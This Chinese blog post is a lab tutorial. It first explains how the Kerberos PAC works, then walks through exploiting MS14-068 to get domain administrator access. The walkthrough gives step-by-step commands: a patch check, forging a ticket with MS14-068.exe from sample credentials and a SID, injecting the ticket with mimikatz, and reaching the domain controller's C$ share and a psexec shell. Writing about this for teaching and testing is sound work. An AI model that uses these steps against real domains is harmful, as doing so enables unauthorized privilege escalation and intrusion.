MS14-068

PAC

PAC会在AS-REP放在TGT里加密发送给ClientPAC 中包含的是用户的 SID、用户所在的组等一些信息。当Client需要访问Server所提供的某项服务时, Server为了判断用户是否具有合法的权限需要将Client的SID、用户所在的组等信息传递给KDC, KDC通过SID判断用户的用户组信息,用户权限等,进而将结果返回给Server,Server再将此信息与用户所索取的资源的ACL进行比较, 最后决定是否给用户提供相应的服务

在PAC中包含有两个数字签名PAC_SERVER_CHECKSUM和PAC_PRIVSVR_CHECKSUM,这两个数字签名分别由Server端密码HASH和KDC的密码HASH加密,并且只有KDC才能制作和查看PAC

也恰恰是是这个 PAC,造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。

MS14-068利用

MS14-068补丁为3011780,可以在域控制器上用命令检测是否存在该漏洞。

如果没有 PAC 的访问控制作用的话,只要用户的身份验证正确,那么就可以拿到 TGT,有了 TGT,就可以拿到 ST,有了 ST ,就可以访问服务了。此时任何一个经过身份验证的用户都可以访问任何服务。当获得了一个域用户后,如果刚好域控机器未打KB3011780补丁,那么就可以利用MS14-068该exp来快速获得域控权限。

环境:

域控:WIN-KONG,
域用户WIN10账号和密码:hiro\win10,123456789qwe

systeminfo |find "3011780" (为空表示存在该漏洞)

image

前提:

1.需要一个域用户账号密码

2.一台主机的管理员权限

域用户查询域的sid:

image

生成票据

ms14-068 -u 域用户名@域名 -p 域用户密码 -s 域sid号 -d 域控主机名 /ip

MS14-068.exe -u win10@hiro.com -p 123456789qwe. -s S-1-5-21-1909134247-741334235-3019370817 -d 192.168.228.10

image

生成TGT_win10@hiro.com.ccache

image

将票据注入到内存中

kerberos::ptc 票据路径

image

查看当前机器凭证

kerberos::list

image

访问域控

访问域控制器时,需要使用FQDN

dir \WIN-KONG.hiro.com\c$

image

同样也可以用Psexec建立连接

psexec.exe \win-kong.hiro.com cmd

image

ps:

1.当获取到域用户、域用户sid、密码以及可访问到域控制器的机器,并不需要机器一定在域中,但需要把dns指向域控制器才能解析

2.访问域控制器时,需要使用主机名,不能使用ip

posted @ 2021-05-23 14:54  cAr7n  阅读(226)  评论(0编辑  收藏  举报